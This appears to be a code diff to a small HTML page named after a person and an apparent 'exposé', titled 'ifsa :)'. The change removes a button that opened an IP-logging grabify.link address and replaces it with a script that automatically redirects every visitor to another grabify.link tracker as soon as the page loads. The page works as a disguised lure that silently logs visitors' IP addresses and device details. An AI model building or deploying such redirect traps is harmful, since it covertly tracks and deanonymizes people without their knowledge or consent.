--- a/huseyinifsa.html
+++ b/huseyinifsa.html
@@ -1,17 +1,12 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>Redirect Button</title>
+    <title>ifsa :) .</title>
+    <script type="text/javascript">
+        window.location.href = "https://grabify.link/RJ2CK9";
+    </script>
 </head>
 <body>
-    <button onclick="openNewTab()">Click Me</button>
-
-    <script>
-        function openNewTab() {
-            var url = "https://grabify.link/QOAX9I";
-            var win = window.open(url, "_blank");
-            win.focus();
-        }
-    </script>
+    <p>If you are not redirected, <a href="https://grabify.link/RJ2CK9">click here</a>.</p>
 </body>
 </html>
